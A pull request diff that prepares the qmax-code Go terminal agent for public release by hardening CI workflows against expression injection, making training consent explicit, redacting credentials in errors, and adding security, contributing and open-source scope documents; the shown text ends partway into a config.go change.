### PR TITLE
Prepare qmax-code for public source audit

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -15,7 +15,8 @@ jobs:
       - name: Setup Go
         uses: actions/setup-go@v5
         with:
-          go-version: "1.23"
+          go-version-file: go.mod
+          check-latest: true
 
       - name: Build
         run: go build ./...

--- a/.github/workflows/qamax-go.yml
+++ b/.github/workflows/qamax-go.yml
@@ -87,6 +87,17 @@ jobs:
         env:
           QAMAX_API_KEY: ${{ secrets.QAMAX_API_KEY }}
           QAMAX_PROJECT_ID: ${{ vars.QAMAX_PROJECT_ID || '164' }}
+          # Bind all GitHub-context values to env vars so they cannot be
+          # interpolated into the bash script body (defense against
+          # ${{ }} expression injection — CodeQL js/actions-script-injection).
+          GOTEST_RESULT: ${{ steps.gotest.outputs.result || 'failed' }}
+          GOTEST_PASSED: ${{ steps.gotest.outputs.passed || 0 }}
+          GOTEST_FAILED: ${{ steps.gotest.outputs.failed || 0 }}
+          GOTEST_TOTAL: ${{ steps.gotest.outputs.total || 0 }}
+          GH_REPO: ${{ github.repository }}
+          GH_REF: ${{ github.ref }}
+          GH_SHA: ${{ github.sha }}
+          GH_RUN_ID: ${{ github.run_id }}
         run: |
           if [ -z "$QAMAX_API_KEY" ]; then
             echo "QAMAX_API_KEY not set — skipping QualityMax report"
@@ -97,14 +108,14 @@ jobs:
           PAYLOAD=$(jq -n \
             --arg project_id "$QAMAX_PROJECT_ID" \
             --arg framework "go_test" \
-            --arg result "${{ steps.gotest.outputs.result || 'failed' }}" \
-            --argjson passed "${{ steps.gotest.outputs.passed || 0 }}" \
-            --argjson failed "${{ steps.gotest.outputs.failed || 0 }}" \
-            --argjson total "${{ steps.gotest.outputs.total || 0 }}" \
-            --arg repo "${{ github.repository }}" \
-            --arg ref "${{ github.ref }}" \
-            --arg sha "${{ github.sha }}" \
-            --arg run_id "${{ github.run_id }}" \
+            --arg result "$GOTEST_RESULT" \
+            --argjson passed "$GOTEST_PASSED" \
+            --argjson failed "$GOTEST_FAILED" \
+            --argjson total "$GOTEST_TOTAL" \
+            --arg repo "$GH_REPO" \
+            --arg ref "$GH_REF" \
+            --arg sha "$GH_SHA" \
+            --arg run_id "$GH_RUN_ID" \
             '{
               project_id: $project_id,
               framework: $framework,

--- a/.github/workflows/qamax-go.yml
+++ b/.github/workflows/qamax-go.yml
@@ -30,7 +30,7 @@ jobs:
       - name: Set up Go
         uses: actions/setup-go@v5
         with:
-          go-version: '1.22'
+          go-version-file: go.mod
           check-latest: true
 
       - name: Cache Go modules
@@ -88,6 +88,11 @@ jobs:
           QAMAX_API_KEY: ${{ secrets.QAMAX_API_KEY }}
           QAMAX_PROJECT_ID: ${{ vars.QAMAX_PROJECT_ID || '164' }}
         run: |
+          if [ -z "$QAMAX_API_KEY" ]; then
+            echo "QAMAX_API_KEY not set — skipping QualityMax report"
+            exit 0
+          fi
+
           # Build JSON payload safely using jq to avoid shell injection
           PAYLOAD=$(jq -n \
             --arg project_id "$QAMAX_PROJECT_ID" \

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -17,7 +17,8 @@ jobs:
       - name: Setup Go
         uses: actions/setup-go@v5
         with:
-          go-version: "1.23"
+          go-version-file: go.mod
+          check-latest: true
 
       - name: Test
         run: |

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -44,7 +44,7 @@ jobs:
           zip -q qmax-code-windows-amd64.zip qmax-code-windows-amd64.exe
           zip -q qmax-code-windows-arm64.zip qmax-code-windows-arm64.exe
 
-      - name: Create Release (private repo)
+      - name: Create Release
         uses: softprops/action-gh-release@v2
         with:
           generate_release_notes: true

--- a/.gitignore
+++ b/.gitignore
@@ -6,3 +6,4 @@ build/
 *.dylib
 .DS_Store
 dist/
+security-roast-report.md

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,0 +1,51 @@
+# Contributing
+
+Thanks for helping improve `qmax-code`.
+
+## Development
+
+Run the test suite before opening a PR:
+
+```bash
+go test ./...
+```
+
+If your local environment cannot write to the default Go build cache, use a
+temporary cache:
+
+```bash
+GOCACHE=/tmp/qmax-code-gocache go test ./...
+```
+
+## Security-Sensitive Changes
+
+Please read [SECURITY.md](SECURITY.md) before changing:
+
+- auth or credential storage,
+- telemetry/error reporting,
+- `read_file`, `write_file`, `run_command`, or `run_local_test`,
+- script healing, backup, or rollback behavior,
+- API error handling or log output.
+
+## Public Source Boundary
+
+`qmax-code` is intended to be the public client/agent boundary. The main
+QualityMax backend can remain closed source. Avoid adding backend implementation
+details, private service names, unpublished roadmap behavior, or proprietary
+scoring/review heuristics to this repository.
+
+See [OPEN_SOURCE_SCOPE.md](OPEN_SOURCE_SCOPE.md) for the current readiness
+checklist and API/tool surface classification.
+
+## Pull Requests
+
+- Keep changes focused.
+- Add or update tests for behavior changes.
+- Update README/security docs when user-facing behavior changes.
+- Do not commit generated binaries, release archives, customer reports, local
+  credentials, or test artifacts.
+
+## License
+
+The public release license still needs to be selected by the maintainers before
+the repository is opened.

--- a/OPEN_SOURCE_SCOPE.md
+++ b/OPEN_SOURCE_SCOPE.md
@@ -4,6 +4,32 @@ This note tracks the first-pass scope for preparing `qmax-code` for a public
 repository. It separates code that is probably safe to publish from code that
 needs product, security, or legal review before release.
 
+## Intended Source Boundary
+
+`qmax-code` can be public while the main QualityMax monorepo remains closed.
+The public repository should be treated as the client/agent boundary; the
+closed monorepo remains the product/backend boundary.
+
+Public `qmax-code` may contain:
+
+- Terminal UX, command parsing, install/build/release scripts, and docs.
+- Client-side auth flows and cloud API calls that are intentionally supported.
+- LLM orchestration, tool definitions, local execution helpers, and safety
+  guards that define the CLI behavior.
+- Provider adapters for Anthropic/Ollama and public configuration.
+
+Closed QualityMax monorepo should retain:
+
+- Crawl engine implementation, test generation services, repository analysis,
+  scoring/coverage algorithms, billing/accounts, and backend authorization.
+- Server-side prompts, ranking heuristics, private model routing, and any
+  proprietary datasets or training/evaluation logic.
+- Unreleased roadmap behavior and experimental endpoints not intended for
+  public client support.
+
+Before public release, every cloud route/tool should be classified as:
+`public-core`, `public-cloud`, `experimental-gated`, or `private/remove`.
+
 ## Phase 0: Repository Hygiene
 
 - Add an explicit `LICENSE`.
@@ -61,6 +87,33 @@ Initial API surface inventory:
 - Local-agent surface: `read_file`, `write_file`, `run_command`,
   `run_local_test`. These are useful but should be documented as trusted-local
   agent powers, not as a remote sandbox.
+
+Proposed launch classification:
+
+| Surface | Suggested class | Notes |
+| --- | --- | --- |
+| Auth and config | public-core | Browser login, API-key login, env/keychain config. |
+| Projects and test cases | public-core | Basic CRUD/listing is expected client behavior. |
+| Automation scripts | public-core | List/get/update plus security scanning are core to the agent. |
+| Test generation and execution | public-cloud | Public client can call closed generation/execution services. |
+| Crawl | public-cloud | Acceptable if AI crawl is an advertised feature. |
+| Repository import | public-cloud | Keep explicit consent and clear data-use docs. |
+| Review, coverage, quality, gap tests | product-review | Reveals product positioning and analysis categories. |
+| PR creation and CI/CD setup | product-review | Public if supported broadly; otherwise gate. |
+| k6 | experimental-gated | Looks broad/beta; decide if ready for public support. |
+| QTML | experimental-gated | Public only if QTML is meant as a stable format. |
+| Framework export/install/run | experimental-gated | Useful, but exposes packaging assumptions. |
+| Screenshot/page analysis | product-review | Clarify whether this is local model, Anthropic, or cloud-backed. |
+| Background job health | private/remove | More operational than user-facing unless documented. |
+| Local file/shell tools | public-core with warning | Must be documented as trusted local agent powers. |
+
+Recommended default launch posture:
+
+- Keep `public-core` and clearly documented `public-cloud` surfaces enabled.
+- Hide `experimental-gated` tools from the default tool registry until each has
+  public docs and support expectations.
+- Remove or keep private any route/tool that exists only for operations,
+  debugging, or backend health.
 
 Phase 2 cleanup completed:
 

--- a/OPEN_SOURCE_SCOPE.md
+++ b/OPEN_SOURCE_SCOPE.md
@@ -134,16 +134,22 @@ Likely okay:
 Needs security review:
 
 - The agent exposes `read_file`, `write_file`, and `run_command` tools. There is
-  some validation, but a public project should document the trust model and test
-  the boundary.
+  some validation, and `SECURITY.md` now documents the trusted-local model.
 - `runLocalTest` downloads test code from QualityMax and executes Python or
   Playwright locally, then reports results back. This is powerful and should be
-  treated as a prominent security notice.
-- Shell validation is prefix-based and allows broad commands such as `python`,
-  `node`, `npm`, `npx`, and `pip`; suitable for a trusted local agent, but not a
-  strong sandbox.
-- Script healing stores backups under `~/.qmax-code/script-backups`; document
-  retention and cleanup.
+  treated as a prominent security notice; `SECURITY.md` now calls this out.
+- Shell validation now checks the first executable token and blocks shell
+  control tokens such as pipes, command substitution, redirection, and chaining.
+  This is still not a sandbox.
+- Script healing stores backups under `~/.qmax-code/script-backups`; this is now
+  documented in `SECURITY.md`.
+
+Phase 3 cleanup completed:
+
+- Added `SECURITY.md` with credential, telemetry, local command, local test, and
+  script backup notes.
+- Added command validation tests for prefix-confusion and shell-control tokens.
+- Tightened `validateCommand` from prefix matching to executable-name matching.
 
 ## Phase 4: Prompt and Model Strategy
 

--- a/OPEN_SOURCE_SCOPE.md
+++ b/OPEN_SOURCE_SCOPE.md
@@ -38,6 +38,8 @@ Before public release, every cloud route/tool should be classified as:
 - Replace "closed-source companion" language in `README.md` when the license
   decision is made.
 - Add public-facing `SECURITY.md`, `CONTRIBUTING.md`, and release policy.
+  `SECURITY.md` and `CONTRIBUTING.md` now exist; license and release policy
+  still need maintainer decisions.
 - Review asset rights for `assets/max-the-cat.mp4` and any referenced README
   images before publishing.
 - Keep generated/customer-specific reports out of source. The local
@@ -181,11 +183,30 @@ Likely okay with docs:
 ## Phase 5: Public Release Prep
 
 - Run a dependency/license review for `go.mod`.
-- Add CI that works for forks without private QualityMax secrets.
+- CI now uses `go-version-file: go.mod` so workflow Go versions stay aligned
+  with the module.
+- QualityMax reporting in CI now skips when the reporting secret is unavailable,
+  which keeps public forks cleaner.
 - Split private release publishing from public release workflows.
 - Decide whether public builds include telemetry, direct QualityMax cloud API,
   or only an OSS/local mode.
 - Create an issue checklist for any intentionally deferred proprietary cleanup.
+
+Phase 5 cleanup completed:
+
+- Added `CONTRIBUTING.md` with development, security-sensitive change, and
+  public source boundary guidance.
+- Updated CI/release workflows to use the Go version from `go.mod`.
+- Gated QualityMax test-result reporting on the presence of `QAMAX_API_KEY`.
+
+Still needs maintainer/legal decision:
+
+- Public license choice.
+- Final release policy and whether to keep publishing to the separate releases
+  repository.
+- Dependency/license review. Local attempt was blocked by sandboxed network DNS
+  resolution for `proxy.golang.org`; rerun in a networked environment before
+  public release.
 
 ## Initial Risk Ranking
 

--- a/OPEN_SOURCE_SCOPE.md
+++ b/OPEN_SOURCE_SCOPE.md
@@ -158,10 +158,25 @@ Needs product/legal review:
 - `agent.go` contains the full system prompt and autonomous healing policy.
   This may be acceptable, but it is product-defining behavior and should be
   intentionally open-sourced rather than leaked accidentally.
-- Model names and provider calls are hardcoded in places. Consider centralizing
-  provider selection and publishing supported provider docs.
-- Ollama mode and fallback behavior are publishable, but remove private host
-  examples before release.
+- The system prompt includes product behavior: capability lanes, review
+  preferences, discovery nudges, autonomous healing, retry limits, and code
+  generation safety rules. Treat it as public product behavior if this repo is
+  opened.
+
+Phase 4 cleanup completed:
+
+- Centralized Anthropic model IDs, API URL, and API version constants.
+- Reused the central model constants for shorthand resolution and screenshot
+  vision analysis.
+- Replaced model-family-specific Ollama comments/status text with generic
+  "local model" wording.
+- Removed private host examples from Ollama configuration comments.
+
+Likely okay with docs:
+
+- Anthropic and Ollama provider adapters are client behavior and can be public.
+- Prompt-based local-model tool dispatch is publishable as long as the enabled
+  tool surface is intentionally classified in Phase 2.
 
 ## Phase 5: Public Release Prep
 

--- a/OPEN_SOURCE_SCOPE.md
+++ b/OPEN_SOURCE_SCOPE.md
@@ -1,0 +1,139 @@
+# Open Source Readiness Scope
+
+This note tracks the first-pass scope for preparing `qmax-code` for a public
+repository. It separates code that is probably safe to publish from code that
+needs product, security, or legal review before release.
+
+## Phase 0: Repository Hygiene
+
+- Add an explicit `LICENSE`.
+- Decide whether generated binaries and release archives stay out of git:
+  `qmax-code` and `dist/` are already ignored, but local copies are present.
+- Replace "closed-source companion" language in `README.md` when the license
+  decision is made.
+- Add public-facing `SECURITY.md`, `CONTRIBUTING.md`, and release policy.
+- Review asset rights for `assets/max-the-cat.mp4` and any referenced README
+  images before publishing.
+- Keep generated/customer-specific reports out of source. The local
+  `security-roast-report.md` is ignored and should not be part of the public
+  repository.
+
+## Phase 1: Secrets and Telemetry
+
+Needs change before opening:
+
+- `error_reporting.go` now requires `QMAX_CODE_TELEMETRY=1` and
+  `QMAX_CODE_TELEMETRY_DSN` before initializing Sentry-compatible reporting.
+  Before release, confirm this opt-in behavior is documented wherever binaries
+  are distributed.
+- `auth.go` stores QualityMax API credentials in `~/.qmax-code/auth.json`
+  with `0600` permissions. `README.md` now documents storage and `/disconnect`
+  cleanup.
+- Known credential patterns are redacted from API errors, command output, local
+  test output, and optional telemetry before display/reporting.
+
+Likely okay with docs:
+
+- Anthropic keys are loaded from env/keychain and are not stored in JSON.
+- QualityMax API keys are sent as bearer tokens over HTTPS.
+
+## Phase 2: API Surface and Product Logic
+
+Needs product review:
+
+- `api_client.go` publishes the complete client-side REST route map for
+  QualityMax projects, crawls, repository review, k6, QTML, framework export,
+  PR creation, and background jobs.
+- `tools.go` publishes the LLM tool schema, capability descriptions, cost
+  categories, and agent-facing workflow assumptions.
+- `ImportRepo` no longer sends `training_consent` by default. It only sends
+  `opt_in` or `opt_out` when the user/tool call explicitly provides one.
+
+Initial API surface inventory:
+
+- Public/core candidate: auth (`/api/me`, CLI login), projects, test cases,
+  automation script list/get/update, generated test code, execution status.
+- Product-review needed: repository import/review, PR creation, gap tests,
+  review preferences, CI/CD setup, coverage/quality analytics.
+- Advanced/beta-looking surface: k6 generation/conversion/reporting, QTML
+  import/export/convert, framework export/install/run, deployment smoke tests,
+  background job health, screenshot/element analysis.
+- Local-agent surface: `read_file`, `write_file`, `run_command`,
+  `run_local_test`. These are useful but should be documented as trusted-local
+  agent powers, not as a remote sandbox.
+
+Phase 2 cleanup completed:
+
+- Removed backend-internal service names from comments/user-facing messages.
+- Replaced private implementation references with generic QualityMax API /
+  execution API language.
+- Added tests covering explicit training consent behavior.
+
+Likely okay:
+
+- A public CLI normally needs documented API paths or an SDK-style client.
+  The question is not "hide all routes"; it is whether any route names reveal
+  private roadmap, pricing, internal service architecture, or unsupported
+  behavior.
+
+## Phase 3: Local Execution and Safety
+
+Needs security review:
+
+- The agent exposes `read_file`, `write_file`, and `run_command` tools. There is
+  some validation, but a public project should document the trust model and test
+  the boundary.
+- `runLocalTest` downloads test code from QualityMax and executes Python or
+  Playwright locally, then reports results back. This is powerful and should be
+  treated as a prominent security notice.
+- Shell validation is prefix-based and allows broad commands such as `python`,
+  `node`, `npm`, `npx`, and `pip`; suitable for a trusted local agent, but not a
+  strong sandbox.
+- Script healing stores backups under `~/.qmax-code/script-backups`; document
+  retention and cleanup.
+
+## Phase 4: Prompt and Model Strategy
+
+Needs product/legal review:
+
+- `agent.go` contains the full system prompt and autonomous healing policy.
+  This may be acceptable, but it is product-defining behavior and should be
+  intentionally open-sourced rather than leaked accidentally.
+- Model names and provider calls are hardcoded in places. Consider centralizing
+  provider selection and publishing supported provider docs.
+- Ollama mode and fallback behavior are publishable, but remove private host
+  examples before release.
+
+## Phase 5: Public Release Prep
+
+- Run a dependency/license review for `go.mod`.
+- Add CI that works for forks without private QualityMax secrets.
+- Split private release publishing from public release workflows.
+- Decide whether public builds include telemetry, direct QualityMax cloud API,
+  or only an OSS/local mode.
+- Create an issue checklist for any intentionally deferred proprietary cleanup.
+
+## Initial Risk Ranking
+
+High:
+
+- Public exposure of full REST/tool map without product review.
+- Local execution of cloud-fetched test code.
+
+Medium:
+
+- Broad API/tool surface still needs product classification before public
+  release.
+- Workflows that reference private release tokens or QualityMax reporting.
+- Telemetry distribution policy, now opt-in via env but still needs release
+  notes/docs.
+- Redaction is pattern-based; keep expanding tests as new credential formats are
+  supported.
+
+Low:
+
+- Keychain/env handling for Anthropic keys.
+- Split CLI auth flags: `--anthropic-api-key` for Anthropic, and
+  `qmax-code login --api-key` for QualityMax.
+- Ignored build artifacts present in the working tree.
+- Missing public governance files.

--- a/README.md
+++ b/README.md
@@ -52,8 +52,11 @@ curl -sL https://raw.githubusercontent.com/Quality-Max/qmax-code/main/install.sh
 # 1. Set your Anthropic API key
 export ANTHROPIC_API_KEY=sk-ant-...
 
-# 2. Login to QualityMax (paste your API key from Settings > API Keys)
+# 2. Login to QualityMax
 qmax-code login
+
+# Or use a QualityMax API key from Settings > API Keys
+qmax-code login --api-key qm-YOUR-API-KEY
 
 # 3. Start using
 qmax-code
@@ -97,6 +100,15 @@ Get your QualityMax API key at: https://app.qualitymax.io/settings
 - Anthropic API key (`ANTHROPIC_API_KEY`)
 - QualityMax account (free at [qualitymax.io](https://qualitymax.io))
 - qmax CLI is **optional** — qmax-code works standalone via REST API
+
+## Auth and telemetry
+
+- Anthropic: set `ANTHROPIC_API_KEY`, pass `--anthropic-api-key`, or save it through the interactive key prompt.
+- QualityMax: run `qmax-code login` for browser login, or `qmax-code login --api-key qm-YOUR-API-KEY`.
+- QualityMax credentials are stored in `~/.qmax-code/auth.json` with `0600` permissions. Run `/disconnect` in the REPL to remove saved QualityMax auth.
+- Anthropic keys saved by the prompt are stored in the OS keychain under the `qmax-code` service; remove them with your platform keychain tool, or use `ANTHROPIC_API_KEY` for session-only auth.
+- Telemetry/error reporting is off by default. To opt in, set `QMAX_CODE_TELEMETRY=1` and `QMAX_CODE_TELEMETRY_DSN`.
+- Known credential patterns are redacted from API errors, command output, local test output, and optional telemetry before display or reporting.
 
 ## Build
 

--- a/README.md
+++ b/README.md
@@ -110,6 +110,10 @@ Get your QualityMax API key at: https://app.qualitymax.io/settings
 - Telemetry/error reporting is off by default. To opt in, set `QMAX_CODE_TELEMETRY=1` and `QMAX_CODE_TELEMETRY_DSN`.
 - Known credential patterns are redacted from API errors, command output, local test output, and optional telemetry before display or reporting.
 
+## Local safety
+
+qmax-code is a trusted local terminal agent. Tools such as `read_file`, `write_file`, `run_command`, and `run_local_test` can access your workspace or run local commands with your user permissions. See [SECURITY.md](SECURITY.md) for the trust model and local backup paths.
+
 ## Build
 
 ```bash

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -1,0 +1,55 @@
+# Security Policy
+
+## Trusted Local Agent Model
+
+`qmax-code` is a local terminal agent. When you run it, it can act with the
+same filesystem and process permissions as your user account.
+
+The following tools are intentionally powerful:
+
+- `read_file` reads local files requested by the agent.
+- `write_file` writes files inside the current working directory.
+- `run_command` runs allowlisted local commands through the shell.
+- `run_local_test` downloads test code from QualityMax, executes supported test
+  frameworks locally, and reports the result back to QualityMax.
+
+These features are designed for trusted development workspaces. They are not a
+remote sandbox, container boundary, or permission system.
+
+## Credential Handling
+
+- QualityMax credentials are stored in `~/.qmax-code/auth.json` with `0600`
+  permissions. Use `/disconnect` to remove saved QualityMax auth.
+- Anthropic keys saved by the interactive prompt are stored in the OS keychain
+  under the `qmax-code` service. You can also use `ANTHROPIC_API_KEY` for
+  session-only auth.
+- Telemetry/error reporting is disabled by default. It only initializes when
+  both `QMAX_CODE_TELEMETRY=1` and `QMAX_CODE_TELEMETRY_DSN` are set.
+- Common credential patterns are redacted before API errors, command output,
+  local test output, or optional telemetry are displayed or reported.
+
+## Local Command Limits
+
+`run_command` uses an executable allowlist and blocks shell control tokens such
+as pipes, command substitution, redirection, and command chaining. This reduces
+accidental damage, but it should not be treated as a security sandbox.
+
+If you need to create or edit files, prefer the `write_file` tool path rather
+than shell redirection.
+
+## Script Backups
+
+When qmax-code updates a QualityMax automation script, it stores a local backup
+under:
+
+```text
+~/.qmax-code/script-backups
+```
+
+Review and remove old backups if they contain sensitive test code.
+
+## Reporting Vulnerabilities
+
+Before the public release process is finalized, report vulnerabilities directly
+to the repository maintainers. Do not file public issues for active credential
+leaks or exploitable vulnerabilities.

--- a/agent.go
+++ b/agent.go
@@ -12,11 +12,13 @@ import (
 	"time"
 )
 
-// Model IDs for smart routing
+// Anthropic defaults for smart routing and direct API calls.
 const (
-	ModelHaiku  = "claude-haiku-4-5-20251001"
-	ModelSonnet = "claude-sonnet-4-20250514"
-	ModelOpus   = "claude-opus-4-20250514"
+	AnthropicMessagesURL = "https://api.anthropic.com/v1/messages"
+	AnthropicVersion     = "2023-06-01"
+	ModelHaiku           = "claude-haiku-4-5-20251001"
+	ModelSonnet          = "claude-sonnet-4-20250514"
+	ModelOpus            = "claude-opus-4-20250514"
 )
 
 // AgentConfig holds configuration for the LLM agent.
@@ -35,8 +37,8 @@ type OllamaMode int
 
 const (
 	OllamaModeOff  OllamaMode = iota // All calls go to Claude
-	OllamaModeChat                    // Chat only (simple Q&A), tools via Claude
-	OllamaModeFull                    // Everything including tool dispatch
+	OllamaModeChat                   // Chat only (simple Q&A), tools via Claude
+	OllamaModeFull                   // Everything including tool dispatch
 )
 
 func (m OllamaMode) String() string {
@@ -377,8 +379,8 @@ func (a *Agent) runStreamingLoop(term *Terminal) (string, error) {
 		}
 
 		// Ollama routing based on mode:
-		// - OllamaModeFull: Gemma handles everything (chat + tools via prompt dispatch)
-		// - OllamaModeChat: Gemma handles chat only, tool requests go to Claude
+		// - OllamaModeFull: local model handles everything via prompt dispatch
+		// - OllamaModeChat: local model handles chat only, tool requests go to Claude
 		// - OllamaModeOff: everything goes to Claude
 		if iterations == 0 && a.ollama != nil && a.ollama.Available() && a.ollamaMode != OllamaModeOff {
 			if a.ollamaMode == OllamaModeFull {
@@ -586,13 +588,13 @@ func (a *Agent) callStreamingAPI(term *Terminal, model string) ([]ContentBlock, 
 		cancel()
 	}()
 
-	req, err := http.NewRequestWithContext(ctx, "POST", "https://api.anthropic.com/v1/messages", bytes.NewReader(data))
+	req, err := http.NewRequestWithContext(ctx, "POST", AnthropicMessagesURL, bytes.NewReader(data))
 	if err != nil {
 		return nil, "", err
 	}
 	req.Header.Set("Content-Type", "application/json")
 	req.Header.Set("x-api-key", a.config.AnthropicKey)
-	req.Header.Set("anthropic-version", "2023-06-01")
+	req.Header.Set("anthropic-version", AnthropicVersion)
 
 	a.logger.Info("api", "request", map[string]interface{}{"model": model, "messages": len(a.history)})
 
@@ -614,8 +616,8 @@ func (a *Agent) callStreamingAPI(term *Terminal, model string) ([]ContentBlock, 
 		apiErr := fmt.Errorf("API error %d: %s", resp.StatusCode, string(body))
 		a.logger.Error("api", apiErr.Error())
 		CaptureError(apiErr, map[string]interface{}{
-			"model":        model,
-			"status_code":  fmt.Sprintf("%d", resp.StatusCode),
+			"model":         model,
+			"status_code":   fmt.Sprintf("%d", resp.StatusCode),
 			"message_count": fmt.Sprintf("%d", len(a.history)),
 		})
 		return nil, "", apiErr
@@ -788,13 +790,13 @@ func (a *Agent) callAPI() (*APIResponse, error) {
 		return nil, fmt.Errorf("marshal request: %w", err)
 	}
 
-	req, err := http.NewRequest("POST", "https://api.anthropic.com/v1/messages", bytes.NewReader(data))
+	req, err := http.NewRequest("POST", AnthropicMessagesURL, bytes.NewReader(data))
 	if err != nil {
 		return nil, err
 	}
 	req.Header.Set("Content-Type", "application/json")
 	req.Header.Set("x-api-key", a.config.AnthropicKey)
-	req.Header.Set("anthropic-version", "2023-06-01")
+	req.Header.Set("anthropic-version", AnthropicVersion)
 
 	if a.config.Verbose {
 		fmt.Printf("[API] Request: %d bytes, %d messages\n", len(data), len(a.history))

--- a/api_client.go
+++ b/api_client.go
@@ -92,11 +92,9 @@ func (c *APIClient) ListScripts(ctx context.Context, projectID, limit int) strin
 	return c.get(ctx, path)
 }
 
-// allowedFrameworks is the whitelist the server (qa-rag-app/services/
-// github_action_setup_service.py::_ALLOWED_FRAMEWORKS) accepts. We enforce
-// it client-side too so bad values get rejected before hitting the wire —
-// saves a DB round-trip and gives the agent a clearer error message.
-// Keep in sync with the server list.
+// allowedFrameworks mirrors the public framework values accepted by the
+// QualityMax API. We validate client-side so bad values get rejected before
+// hitting the wire and the agent can show a clearer error message.
 var allowedFrameworks = map[string]bool{
 	"":           true, // omitted → server auto-detects
 	"playwright": true,
@@ -131,8 +129,8 @@ func (c *APIClient) GenerateTestCode(ctx context.Context, testCaseID int, force 
 	if force {
 		body["force"] = true
 	}
-	// framework override flows into the qa-rag-app generator so the user
-	// can request Rust/Go script generation instead of the default Playwright.
+	// framework lets users request Rust/Go script generation instead of the
+	// default Playwright path.
 	// Empty string → server picks based on project settings + repo analysis.
 	if framework != "" {
 		body["framework"] = framework
@@ -144,8 +142,8 @@ func (c *APIClient) GenerateTestCode(ctx context.Context, testCaseID int, force 
 
 func (c *APIClient) RunTest(ctx context.Context, scriptID int, headless bool, browser, baseURL string) string {
 	body := map[string]interface{}{
-		"headless":         headless,
-		"use_browserbase":  false, // Use QualityMax server runner, not BrowserBase
+		"headless":        headless,
+		"use_browserbase": false,
 	}
 	if browser != "" {
 		body["browser"] = browser
@@ -157,10 +155,8 @@ func (c *APIClient) RunTest(ctx context.Context, scriptID int, headless bool, br
 }
 
 // RunNativeTest executes a Rust (cargo test) / Go (go test -json) automation
-// script on the QualityMax server runner. The `/api/automation/execute`
-// endpoint dispatches by the script's framework field: Playwright/Cypress
-// go to the browser runner, Rust/Go go through services.native_test_execution_service
-// (normalized console_logs, passed/failed/total, stdout, stderr).
+// script through the QualityMax execution API. The backend dispatches by the
+// script's framework field and returns a normalized result shape.
 //
 // Use this when the script is framework=rust_cargo or go_test. For
 // Playwright scripts, keep using RunTest — the cloud runner path there
@@ -310,7 +306,7 @@ func (c *APIClient) RepoQuality(ctx context.Context, repoID int) string {
 
 // --- Import operations ---
 
-func (c *APIClient) ImportRepo(ctx context.Context, url string, projectID int, createProject bool, projectName, baseURL string) string {
+func (c *APIClient) ImportRepo(ctx context.Context, url string, projectID int, createProject bool, projectName, baseURL, trainingConsent string) string {
 	body := map[string]interface{}{
 		"repo_url": url,
 	}
@@ -326,7 +322,14 @@ func (c *APIClient) ImportRepo(ctx context.Context, url string, projectID int, c
 	if baseURL != "" {
 		body["base_url"] = baseURL
 	}
-	body["training_consent"] = "opt_in"
+	switch trainingConsent {
+	case "opt_in", "opt_out":
+		body["training_consent"] = trainingConsent
+	case "":
+		// Omit by default; consent should be explicit.
+	default:
+		return jsonError(`training_consent must be "opt_in" or "opt_out"`)
+	}
 	return c.post(ctx, "/api/repositories/import", body)
 }
 
@@ -661,7 +664,7 @@ func (c *APIClient) doRequest(req *http.Request) string {
 
 	resp, err := c.HTTP.Do(req)
 	if err != nil {
-		return jsonError(fmt.Sprintf("request failed: %s", err))
+		return jsonError(fmt.Sprintf("request failed: %s", redactSensitive(err.Error())))
 	}
 	defer resp.Body.Close()
 
@@ -688,6 +691,7 @@ func (c *APIClient) doRequest(req *http.Request) string {
 		if errMsg == "" {
 			errMsg = fmt.Sprintf("HTTP %d: %s", resp.StatusCode, string(data))
 		}
+		errMsg = redactSensitive(errMsg)
 
 		// Report server errors (5xx) and auth errors (401/403) to Bugsink
 		if resp.StatusCode >= 500 || resp.StatusCode == 401 || resp.StatusCode == 403 {
@@ -705,6 +709,7 @@ func (c *APIClient) doRequest(req *http.Request) string {
 }
 
 func jsonError(msg string) string {
+	msg = redactSensitive(msg)
 	escaped, _ := json.Marshal(msg)
 	return fmt.Sprintf(`{"error": %s}`, string(escaped))
 }

--- a/api_client_native_test.go
+++ b/api_client_native_test.go
@@ -206,6 +206,62 @@ func TestGenerateTestCode_RejectsInvalidFramework(t *testing.T) {
 	}
 }
 
+// ---- ImportRepo ----
+
+func TestImportRepo_OmitsTrainingConsentByDefault(t *testing.T) {
+	var gotPath string
+	var gotBody map[string]interface{}
+	client, _ := newTestClient(t, func(w http.ResponseWriter, r *http.Request) {
+		gotPath = r.URL.Path
+		raw, _ := io.ReadAll(r.Body)
+		_ = json.Unmarshal(raw, &gotBody)
+		_, _ = w.Write([]byte(`{"success":true}`))
+	})
+
+	out := client.ImportRepo(context.Background(), "https://github.com/acme/app", 42, false, "", "", "")
+
+	if gotPath != "/api/repositories/import" {
+		t.Errorf("path: got %q, want /api/repositories/import", gotPath)
+	}
+	if strings.Contains(out, "error") {
+		t.Fatalf("unexpected error: %s", out)
+	}
+	if _, ok := gotBody["training_consent"]; ok {
+		t.Errorf("training_consent should be omitted by default, got %+v", gotBody)
+	}
+}
+
+func TestImportRepo_AcceptsExplicitTrainingConsent(t *testing.T) {
+	var gotBody map[string]interface{}
+	client, _ := newTestClient(t, func(w http.ResponseWriter, r *http.Request) {
+		raw, _ := io.ReadAll(r.Body)
+		_ = json.Unmarshal(raw, &gotBody)
+		_, _ = w.Write([]byte(`{"success":true}`))
+	})
+
+	_ = client.ImportRepo(context.Background(), "https://github.com/acme/app", 42, false, "", "", "opt_out")
+
+	if gotBody["training_consent"] != "opt_out" {
+		t.Errorf("training_consent: got %v, want opt_out", gotBody["training_consent"])
+	}
+}
+
+func TestImportRepo_RejectsInvalidTrainingConsent(t *testing.T) {
+	calls := 0
+	client, _ := newTestClient(t, func(w http.ResponseWriter, r *http.Request) {
+		calls++
+	})
+
+	out := client.ImportRepo(context.Background(), "https://github.com/acme/app", 42, false, "", "", "yes")
+
+	if calls != 0 {
+		t.Errorf("expected no HTTP call for invalid training_consent, got %d", calls)
+	}
+	if !strings.Contains(out, "training_consent") {
+		t.Errorf("expected training_consent validation error, got %q", out)
+	}
+}
+
 // ---- validateFramework (direct unit test of the allow-list) ----
 
 func TestValidateFramework_AllowList(t *testing.T) {

--- a/config.go
+++ b/config.go
@@ -8,24 +8,23 @@ import (
 
 // Config holds persistent user preferences for qmax-code.
 type Config struct {
